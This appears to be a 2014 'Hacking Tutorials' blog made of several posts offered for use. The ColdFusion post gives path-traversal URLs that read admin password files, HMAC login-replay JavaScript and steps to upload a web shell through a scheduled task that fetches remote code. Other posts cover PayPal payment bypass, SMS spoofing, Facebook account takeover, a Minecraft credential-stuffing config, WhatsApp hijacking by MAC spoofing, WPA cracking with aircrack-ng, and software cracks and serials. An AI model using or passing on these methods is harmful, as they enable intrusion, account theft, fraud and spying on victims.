Friday, January 31, 2014

You Tube Views Hacking 2014 (100% working)

Youtube Views Hacking 2014 (100% working)



Hello Friends,i ve wanted to contribute to community by sharing youtube bot which i am using for more than 1 year(or even more).


Before download links here are virus scans 
Virus total 12/42


jotti 4/20


It looks suspicious and i am new around here .. My advice would be to run it in sand box or virtual machine unless you know what are these reports or know how to analyze changes(and other stuffs) on your pc ... 

This is the original screen shot i ve made long time ago and some of you probably saw it on other forum(won't mention which one) .. 


Here are download links :



Keep reading:
I have saw my post leeched before,and in most cases leechers forgot to add one important stuff the freeze time..

At ~250 views youtube usually lock/freeze view count. However that is bypassed after 4-6 hours of constant visits(bot running,i run 3-4 instances of the bot at once usually).

It is interesting that many claimed it is not working,however i have increased views of one of my videos (have 2 videos on channel) to 1600+, just as test,and in few days the rate jumped to 2,9k+ and i got 3 new subs on channel. If you are interested for live preview of the video PM me. Here is SS of the video :



Thursday, January 30, 2014

Download From Paypal Site , With Out PAYING!! Paypal Hacking 2014

Download From Paypal Site , With Out PAYING!! Paypal Hacking 2014



Just a little basic html tip for those who are trying to download an application from sites which has an paypal order page & link to start you off.

Use a proxy when you try this to hide your ip as some sites will record your ip when you connect for security.

1) Rightclick your mouse (ctrl+click) viewsource and open the source of the site in an a texteditor
2) Search for the word "return"
3) Next to it you can find the url for the thank you page
4) Copy the url and paste it in your browser and you will see the download link

This works only if you can download instantly after payment, it will not work if the link needs to be emailed to you.

You can try it here to start with:


About half way down the page you will find:

<input type="hidden" name="return" value="http://www.ramphelp.com/65984523/thanks/68912hp654/26865thankyouhp08363215423.html ">

Copy the link into your browser and download.

Wednesday, January 29, 2014

ColdFusion Exploit - Hack Big Sites With Ease! - High Detail

ColdFusion Exploit - Hack Big Sites With Ease! - High Detail



This tutorial gives you a basic understanding of the ColdFusion exploit. There's very many government and military websites that use this software, but only about 15% are vulnerable. I was nearly into ca.gov last night, but my friend who got into it before me, shelled the server and then patched it so only he has it. (I was extremely mad at this point - haha). Well, let's get started!

What is Adobe ColdFusion?
ColdFusion is a commercial rapid web application development platform invented by Jeremy and JJ Allaire in 1995. (The programming language used with that platform is also commonly called ColdFusion, though is more accurately known as CFML.) ColdFusion was originally designed to make it easier to connect simple HTML pages to a database. By Version 2 (1996), it had become a full platform that included an IDE in addition to a "full" scripting language. As of 2010, versions of ColdFusion (purchased by Adobe Systems in 2005) include advanced features for enterprise integration and development of rich Internet applications.
(http://en.wikipedia.org/wiki/Adobe_ColdFusion)

Requirements
Suggested - VPN, Proxy or Tor
A Javascript Snippet - Will Be Provided Later On
Tamper Data - Firefox (Tor) Plugin

Finding a site that uses Coldfusion:
This is extremely easy by the use of the "ext" google dork:
Code:
ext:cfm

Testing to see it's vulnerable:
The way we test to see if the site's vulnerable, is by first going to the admin panel. So, for example, if we have the following URL:
Code:
http://site/random/directories/shit/lol/document.cfm

We would then go to:
Code:
http://site/CFIDE/administrator

This will then display us the Adobe ColdFusion administrator panel unless we're denied access to the panel. You should see a page like this: 




You're now going to want to take a note of the Adobe ColdFusion version, this is viewable on the administrator panel. Adobe ColdFusion version 6, 7 and 8 are vulnerable to this attack only. For other versions see 9 & 10 at the bottom of the thread.

I've found a vulnerable version, now what do I do?
You're going to want to follow the exploits below, depending on the version. Please bare in mind, these next parts all have to be done within 30 seconds, as the salt changes every 30 seconds!

(For Version 9 and 10 - Please look near to the bottom of the thread.

Version 6
Code:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.propertiesen

Version 7
Code:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.propertiesen​

Version 8
Code:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.propertiese​n

If the exploit is successful, the administrator's password hash value will be displayed on the password. I currently have no vulnerable sites so I cannot show you an example.

Version 9 & 10
You're going to want to install Python. This tutorial is quite dependent on your operating system. I will be focusing on Windows as that's what most of you use. I may write up one for Linux in the future.

First of all, install Python and then install Python Requests (http://docs.python-requests.org/en/latest/). Then save the following script to your Desktop as a.py: http://www.exploit-db.com/exploits/25305/

Windows users:
Open up command prompt and CD to the desktop
Code:
cd desktop

Then to run the script just enter in the name, if you saved it as a.py like I told you then just type:
Code:
a.py

This should run the script.

You now need to enter the URL ONLY, don't put /CFIDE/ after it. Just the URL. If the url is:
Code:
http://dtsc.ca.gov/CFIDE/administrator/

Then you would put the URL like this:
Code:
http://dtsc.ca.gov

Example:



If you get the following feedback, then it is not vulnerable:



If it is vulnerable, you will get feedback from the script with the HMAC. Then proceed to the following steps.

How can I login with a hashed password?
Now, here comes the tricky part!

You're going to make sure you have scripts enabled (for those who have NoScript) - Enter the following javascript code into your browser - although it works better if you use Scratchpad (Shift + F4 for Firefox / Ctrl + Alt + N for Chrome users):
Code:
javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.​cfadminPassword.value))

NOTE: IF YOU ARE USING SCRATCHPAD DO NOT INCLUDE THE "java-script:" PART AS IT WILL NOT WORK

You will get an alert with the HMACed hash. Copy this value. Next, start Tamper Data and click "Start Tamper" then click login, and paste the hash you obtained from the javascript in the cfadminPassword field. 

If you were fast enough, you will now be logged in! Congratulations if you did it right!

Shelling The Server
What's the point of gaining access to the administrator panel if we can't even shell the server? Well, I'm going to tell you how we can!

You're going to need to have an Adobe ColdFusion Shell. You can try with a regular PHP Shell or an ASP shell but these are usually blocked. I've not been able to find this shell publically anywhere else, and is relatively private. So, for the first time I'm going to be posting here. This is the entire fUZE CFM Shell and is the current best public CFM Shell: 


Save this to your user area (on your PC) as filename.cfm for quick access in the future. Just in case you use the raw shell location, although the raw shell code is what you need for shelling the site.

Now, here comes the shelling. Once you're in the administrator panel of ColdFusion head on over to the "Settings Summary" tab on the left hand side of the panel, and find the "Mappings" section. This page shows you the full path disclosure of the CFIDE location. One of the default mappings is /CFIDE. This is where we will be writing the shell to, as that is the /CFIDE/ part of the website you're in currently. Copy the full path next to where it says /CFIDE.

Next, we need to head on over to the "Debugging and Logging" tab on the left panel and click "Scheduled Tasks". This allows us to run a task on the site (and with a little persuasion, shell the server by uploading a script). Click "Schedule New Task". Set the task name to whatever, it doesn't really matter, if you want to be more stealthy put something like "Scheduled Configuration". 

Now, we change the "URL" part of the page to the RAW shell source. Hence why I supplied you with a pastebin in raw format. You can use raw pastebin links unless it is blocked by the sites Firewall. Check the option to save the output to a file. Paste the path you copied from "Mappings" into the "File" field. Type the name you want to save the shell as and the extension (cfm). So, as this is going in the /CFIDE/ directory off the site, name it something like "confg.cfm". 

Double check to make sure you have done everything correctly according to this tutorial and then click "OK". Then when the page reloads, click the green check/tick to run the task. This will then upload your shell!

If everything is done correctly, your shell will be uploaded! Now to access the shell:


http://yourhackedsite.com/CFIDE/yourshellname.cfm

You will be challenged with login information. If you used the default settings from the above script then these will be your details:


Vexy:pass123

How It Should Be Done
If you want to take a look at how I do things, here you go:
Spoiler (Click to View)
a.py = Subzero
b.py = Python 1liner for HMAC/Salt

~Written by root with help from the following link - If you find this thread anywhere else apart from HF, please PM me as they have stole it

Monday, January 27, 2014

SMS HACK : SEND SMS FROM FRIENDS MOBILE TO ANY NUMBER

SMS HACK : SEND SMS FROM FRIENDS MOBILE TO ANY NUMBER



How to send SMS from any mobile number to any mobile number that means how to send SMS from your friend's mobile to your mobile or your friends mobile to your friends mobile or any other number. Basically this technique is call SMS spoofing. By SMS spoofing we can send SMS to any mobile using anyone's mobile number. How this trick can be helpful?? its simple it is helpful when you wanna prank your friends, enemies or simply you want to send free SMS to your friends using their numbers only. 


What is SMS Spoofing?


Spoofing is basically mimic of the original i.e. SMS spoofing basically is a technique to send anonymous SMS to any mobile number. By anonymous i means that we can use any mobile number to send the SMS. 

This is not actually a trick or hack but it's a service that a company is providing but the only thing the company forgot is internal send ID Check i.e. which number we are using to send SMS. So this service allows us to send SMS from any number to any number that means. Now the number that we register will be shown to the slave.
Hence we are exploiting the Internal sender ID phone verification feature.

Feature's of SMS spoofing:

Spoofed sms (any mobile number to any mobile number)
100% anonymous messages
Worldwide Network (i.e. we can send SMS all over the world)
No advertisements
Instant Delivery of SMS

How to use this Hack? 

1. First of all, register here . This website looks like this . Fill as i shown below:



2. After Registering you will get 25 free credits that means you can send 25 free SMS from any number to any number. For using it again register another mobile and email ID HERE . 25 SMS is the limitation of this trick from one registered number.. Usually people have two to three sims.

3. Now after registering you will receive password on registered mobile number.

4. Now login with that password that you got on mobile.

5. Now go to Send SMS to number . As shown in snapshot below:



6. After entering the details as explained in snapshot above. Click on send.

7. That's all the hack. I know its limited but its awesome...Isn't It..

Sunday, January 26, 2014

How to hack a facebook account 2014 (100% working)

How to hack a facebook account 2014 (100% working)


Hi guys, hacking a facebook account isn't an easy task these days, because now a days faecook started to focusing more onto their security, in order to prevent their users from being hacked. But there are still some loopholes in their security exists. I've found some of them and tested them with myself and finally came to know that this trick is working hundred percent. so lest get started.


Step1: Go to victim's page and get there email, then log out of your facebook.

Step 2: Make 3 FAKE profiles with info and pictures (try to make it looking like legit).

Step 3: Send the friend request to the slave from those 3 accounts.

Step 4: Go to facebook.com and enter the email you have got on step 1 and click forgot your password.

Step 5: When you get to the secret question, take a couple good guesses at what those passwords could be.

Step 6: If you fail the secret answer three times don't worry, it will ask you to select 3 of your trusted friends. Then facebook will send the code to those friends. Now we're going to choose the 3 fake profiles we made as the trusted friends.

Step 7: Log into all of the fake profiles and retrieve the codes.

Step 8: Finally reset there password and enjoy your victim's facebook.

Countermeasures:- 

1. Never accept unknown friend requests.
2. Never disclose your e-mail address.


Photoshop CC 2014 Latest Version Full Version Free

Photoshop CC 2014 Latest Version Full Version Free



Here a short and easy way to get PhotoShop CC for free.

Here i gonna teach how do u get FREE Photoshop CC. 
LINKS ARE Coinurl!

By Official serach the trail version ( Button called 'try') ...

2. After Install DON'T RUN Photoshop
Go to the photoshop folder of your version:

64-Bit: Go to: C:\Program Files\Adobe\Adobe Photoshop CC (64 Bit)

32-Bit: Go to: C:\Program Files (x86)\Adobe\Adobe Photoshop CC

Copy & Replace the amtlib.dll
And your are done.


Get crack HERE From Mediafire

3. Run Photoshop

Run Photoshop and try if it works.

This method works for me on a Win7 / 64-Bit Dell Laptop!

Friday, January 24, 2014

Bitdefender Total Security Antivirus Paid Activation Free

Bitdefender Total Security best antivirus software of 2013-2014 Paid Activation Free

Searching for a good antivirus software?



Bitdefender Total Security is rated the best antivirus software of 2013-2014.



Check

Now, without spending $79.95 for purchasing it, you can now keep your computer in best condition for free!

//STEPS

1. Download the trial version here:

2. Clicking on the bottom of the antivirus GUI after installed to enter the serial code.

Serial codes:
(Only need to choose one!)

AV3UPA3
2YRGQZD
4WG7VD3
7JF5M6Y
ZSEWDY0
7JF5M6Y
RQKQFGZ
LEMLUJ0

Enjoy! Yeye

How to crack/hack Minecraft Accounts

How to crack/hack Minecraft Accounts


Hello,

Today, we will see a guide or tutorial on How to crack Minecraft Accounts. The tool we are going to be using in this tutorial is called Apex.

You can download Apex from below link:


Once you have Apex downloaded you will need a Minecraft config, enter config as below:


Name=Minecraft
Host=www.minecraft.net
UseProxies=True
UsePost=True
PostString=authenticityToken=a8fa80e5d8b7d94db1bab22c856e946858a3c95a&redirect=http%3A%2F%2Fwww.minecraft.net%2F&username=[user]&password=[pass]
CrackedString=Set-Cookie: PLAY_FLASH=url
BannedString=
InvalidString=Set-Cookie: PLAY_FLASH=body
UseEmails=False
PostPage=/login

Now copy and paste the above config and put it in your config.ini file that came with Apex. And add Minecraft to the list of logins, so your new login line will look like this after Minecraft added:

Quote:
Logins=RSAPI,MU,NL,DF,UT,HF,BAD,C4,IL,FF,MF,MFC,ST,PB,FB,SM,ULCOM,MC

You'll notice all I did was add MC to the end, which is what I called my config.

Now you will need a good combolist or wordlist. If you have one load it up in Apex with the Load button. You can find lot of proxies in below section if you don't have any:




After that you will need proxies. You can load proxies in Apex by clicking the Load button on the Proxy Lists section. If you have a list great, if not get some from the link above, but make sure to check them with some proxy checker.



Now go to the Site Settings section in Apex, and choose Minecraft from the dropdown list. We can now start cracking :) .Click Start! Go back to the Cracking Lists section to monitor your progress and see accounts that have been cracked.



Thats it, enjoy cracking Minecraft accounts. Glad



Thursday, January 23, 2014

HACK INTO A DATABASE AND TAKE FILES

HACK INTO A DATABASE AND TAKE FILES



What will you need?

You need basic computer skills such as making new folders.
You Need a dos called Wget You can download from HERE
You need to have administrative privileges on your computer.

The Tutorial Begins

Step 1: Download Wget from HERE and put it on the root of your operating system, most people have "C" So go there and make a new folder called wget NO CAPS. Inside only put the dos. (btw the dos doesn't open I will show you how to use it.

Step 2: Open Cmd
In XP go to run and put CMD or command.com
In vista/7 Search for CMD and right click open as Administrator.



Step 3: In Cmd put "cd C:\wget" No quotes and if your main drive is not C put it as your main drive.



Step 4:Post this command "wget -r -A.jpg" (Don't press enter) See how it says .jpg, you can make it the extension your trying to get. Right now it would take any file with the extension .jpg and download it. If you changed the command to wget -r -A.html it would get all the html files ect.




Step 5 : Now after that you can space once and put the website or link/server you want to take from. It will check for safety and certificates if you don't want it too because its a hassle you can put this. --no-check-certificate. So after you put the first command you space you put this then you space again and post the website/link/server and port if you want to get specific. 

Step 6: Now you're set! Just press enter and watch the magic happen. You can open another cmd and do another file extension at the same time.



Step 7: Now just go to the wget folder on C: and open it. There should be a new folder of the website in there. Click on it and thats the files.



Ok now if you have any questions whats so ever, feel free to post below.


All Microsoft Windows Product Activator

All Microsoft Windows Product Activator



This is a set of tools and functions for managing licensing, deploying, and activating Microsoft Office and Windows. All output from these functions is displayed in the Information Console. All functions are run in the background and the GUI is disabled to prevent running multiple functions, as they could conflict or cause damage if run concurrently. The Microsoft Office Setup Customization Functions (Customize Setup Tab), AutoKMS Uninstaller (if AutoKMS is installed), AutoRearm Uninstaller (if AutoRearm is installed), Office Uninstaller and Product Key Checker work even if Microsoft Office or Windows is not installed/supported. For information about individual functions, see the program readme.

Requirements:
Microsoft .NET Framework 4.0 or 4.5 (Not 3.5)
Microsoft Office 2010 or Later for Office Toolkit Support 
Windows Vista or Later for Windows Toolkit Support

 Download From Below


How to see others Whatsapp messages

How to see others Whatsapp messages



REQUIREMENTS

1) ROOTED PHONE
2) BUSYBOX INSTALLED
3) Terminal App
4) Victims phone for 10 minutes


YOU MUST BE IN THE SAME NETWORK FOR THIS!!

First of all uninstall you Whatsapp.

What you want to know?:

The mac address of the victim:

For Android
Head over to settings—> About phone—> Status—> Wi-Fi MAC address.


WE need to spoof our MAC ADDRESS
Spoof you MAC ADDRESS to the one of the victim


Open terminal and write:

:su
:busybox iplink show eth0

(This will revail your address)

Now type this in to spoof your MAC ADDRESS

:busybox ifconfig eth0 hw ether 00:11:22:33:44:55

(INSTEAD OF 00:11:22:33:44:55, you need to write your victims MAC ADDRESS)



Now you have succesfully spoofed your MAC ADDRESS.


After this download Whatssapp and enter the mobile number of your victim, verify your account by entering the verification code received on victim’s phone.

DONE!

Wednesday, January 22, 2014

How To Hack Wi-Fi WPA/WPA2 Password

How To Hack Wi-Fi WPA/WPA2 Password



What We Need to hack Wi-fi Password?

2)Compatable Wi-fi Card

So Let's Start... 1st open Terminal and Then Follow My Steps : 

1)In Terminal type : airmon-ng
there we can see interfaces

2)Then type :airmon-ng start wlan0
It must found proceses

3)then we type : airodump-ng mon0
it will start scanning wi-fi networks

4)copy bssid and tpye : airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0


5)type : aireplay-ng -0 5 -a (bssid) mon0

6)click on places home folder drag in terminal wpa-01.cap in terminal and type : aircrack-ng (file Directory) or drag file in terminal

7)type in terminal : aircrack-ng (filename)*.cap -w (dictionary location) And Hit Enter!

Success!

password now has been hacked.... so you can enter and enjoy with hacked wi-fi : ))

 

© 2013 Hacking Tutorials. All rights resevered. Designed by Ranjan Bawa

Back To Top